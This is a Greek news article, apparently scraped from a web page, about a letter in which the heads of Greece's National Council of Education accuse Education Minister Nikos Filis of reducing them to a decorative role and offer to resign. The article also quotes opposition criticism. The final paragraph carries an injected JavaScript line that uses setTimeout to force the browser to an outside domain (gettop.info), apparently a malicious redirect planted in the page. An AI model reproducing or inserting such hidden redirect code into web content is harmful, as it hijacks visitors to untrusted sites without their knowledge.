Επιστολή στον Φίλη από τον πρόεδρο του Εθνικού Συμβουλίου Παιδείας

0
12

 

Με επιστολή του προς τον υπουργό Παιδείας Νίκο Φίλη ο πρόεδρος του Εθνικού Συμβουλίου Παιδείας αναμένεται να ανατρέψει την ομαλή εικόνα συνεργασίας των τριών πυλώνων, πάνω στους οποίους στηρίζεται το οικοδόμημα του εθνικού και κοινωνικού διαλόγου του υπουργείου Παιδείας, για τις αλλαγές σε όλο το φάσμα της εκπαίδευσης στη χώρα.

Στην επιστολή του προέδρου του Εθνικού Συμβουλίου Παιδείας (ΕΣΥΠ) Νίκου Θεοτοκά και των προέδρων των τριών συμβουλίων που απαρτίζουν το ΕΣΥΠ, Δημήτρη Χασάπη (ΣΠΔΕ, Συμβούλιο Πρωτοβάθμιας και Δευτεροβάθμιας Εκπαίδευσης), Βασίλη Καρδάση (ΣΑΠΕ, Συμβούλιο Ανώτατης Πανεπιστημιακής Εκπαίδευσης) και Δημοσθένη Σταμάτη (ΣΑΤΕ, Συμβούλιο Ανώτατης Τεχνολογικής Εκπαίδευσης), που κοινοποιήθηκε στον πρωθυπουργό Αλέξη Τσίπρα, την αναπληρώτρια υπουργό Παιδείας Σία Αναγνωστοπούλου, αλλά και τον πρόεδρο και τα μέλη της διαρκούς Επιτροπής Μορφωτικών Υποθέσεων της Βουλής, εκφράζεται η έντονη δυσαρέσκεια για τον «διακοσμητικό ρόλο», στον οποίον έχουν περιοριστεί και τονίζουν ότι «ανά πάσα στιγμή» μπορεί ο υπουργός να ζητήσει τις παραιτήσεις τους.

«Παρά τις επίμονες και συνεχείς εκκλήσεις μας να ορίσετε εκπροσώπους του Υπουργείου Παιδείας, Έρευνας και Θρησκευμάτων στο ΕΣΥΠ, παρά τις εισηγήσεις μας για την ανάγκη άμεσης σύγκλησης των Ολομελειών και τη σύσταση επιτροπών εργασίας που θα επεξεργαστούν με συστηματικό τρόπο τα πορίσματα του Εθνικού και Κοινωνικού Διαλόγου για την Παιδεία, παρά τη σιωπή που ακολούθησε την επιστολή απολογισμού (Αρ. Πρωτ. 3522/12.9.2016) που σας έστειλε ο Πρόεδρος του ΕΣΥΠ, παρά την από μέρους σας απόρριψη του σχεδίου πρόσκλησης της Ολομέλειας του ΕΣΥΠ (Αρ. Πρωτ. 3523/3.10.2016) και την εισήγηση για την ανάγκη κοινής συνεδρίασης ΣΑΠΕ και ΣΑΤΕ για το θέμα των Μεταπτυχιακών και Διδακτορικών Σπουδών (e-mail, 13.10.2016), επιμένετε στην απόφασή σας να είμαστε και να παραμείνουμε Πρόεδροι διακοσμητικοί. Το γεγονός μάς προσβάλλει και μας εκθέτει. Το ότι δεν έχετε απαντήσει σε καμία από τις ιδιωτικές και επίσημες επιστολές μας, το εκλαμβάνουμε πλέον ως απόλυτη διαφωνία με τις εισηγήσεις μας ή ως έμμεση υπόδειξη να οδηγηθούμε σε παραίτηση» αναφέρεται χαρακτηριστικά.

Επίσης, οι υπογράφοντες την επιστολή επισημαίνουν ότι με τις ενέργειες του υπουργού, οι αρμοδιότητες του προέδρου του ΕΣΥΠ και των Προέδρων των τριών Συμβουλίων που το συναπαρτίζουν θα περάσουν στον Κώστα Γαβρόγλου, πρόεδρο της επιτροπής Μορφωτικών Υποθέσεων και προσθέτουν, απευθυνόμενοι στον υπουργό: «Αρνηθήκατε τη σύγκληση της Ολομέλειας του ΕΣΥΠ για να κατατεθούν προς συζήτηση και επεξεργασία τα πορίσματα του Εθνικού και Κοινωνικού Διαλόγου για την Παιδεία, του Ινστιτούτου Εκπαιδευτικής Πολιτικής και της Επιτροπής Μορφωτικών Υποθέσεων της Βουλής των Ελλήνων καθώς και οι αναλυτικές προτάσεις μας για την ανασυγκρότηση του Εθνικού Συμβουλίου. Αρνηθήκατε την κοινή συνεδρίαση του ΣΑΤΕ και ΣΑΠΕ, ώστε να συζητηθούν οι προτάσεις για τις Μεταπτυχιακές και Διδακτορικές Σπουδές. Δεν θα επιμείνουμε άλλο. Εκλαμβάνουμε τη σιωπή και τις ρητές αρνήσεις σας ως δηλώσεις της επιλογής σας να ακυρωθούν οι όροι που συμφωνήσαμε, ώστε να αποδεχτούμε την τιμητική τοποθέτησή μας στο ΕΣΥΠ».

«Εφ’ όσον οι επιλογές που προκρίνετε δεν περιλαμβάνουν την ενεργοποίηση του Εθνικού Συμβουλίου Παιδείας με τον ορισμό εκπροσώπων του Υπουργείου σε αυτό, με μεγάλη λύπη και απογοήτευση, είμαστε υποχρεωμένοι να σας υπενθυμίσουμε ότι μπορείτε, ανά πάσα στιγμή, να ζητήσετε τις παραιτήσεις μας από τις θέσεις των Προέδρων του ΕΣΥΠ, του ΣΠΔΕ, του ΣΑΠΕ και του ΣΑΤΕ» καταλήγει η επιστολή.

Την επιστολή σχολίασε και ο τομεάρχης Παιδείας της ΝΔ, Μάξιμος Χαρακόπουλος, ο οποίος ανέφερε ότι η επιστολή του κ. Θεοτοκά προς τον υπουργό για την άρνηση της συγκρότησης και σύγκλησης του ΕΣΥΠ «επιβεβαιώνει με τον πλέον ηχηρό τρόπο, το θεσμικό κατήφορο της ηγεσίας του Υπουργείου Παιδείας».

Ο κ. Χαρακόπουλος υπογράμμισε ότι το κόμμα της αξιωματικής αντιπολίτευσης θεωρεί το ΕΣΥΠ καθ’ ύλην αρμόδιο όργανο για τη διεξαγωγή διαλόγου για την Παιδεία και πρόσθεσε: «Κατόπιν των σοβαρών αυτών καταγγελιών, καλούμε, έστω και την ύστατη στιγμή, τον κ. Φίλη να συνέλθει, να πάψει να αντιμετωπίζει με αλαζονεία τους θεσμούς και να συγκροτήσει άμεσα, ως οφείλει, το ΕΣΥΠ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here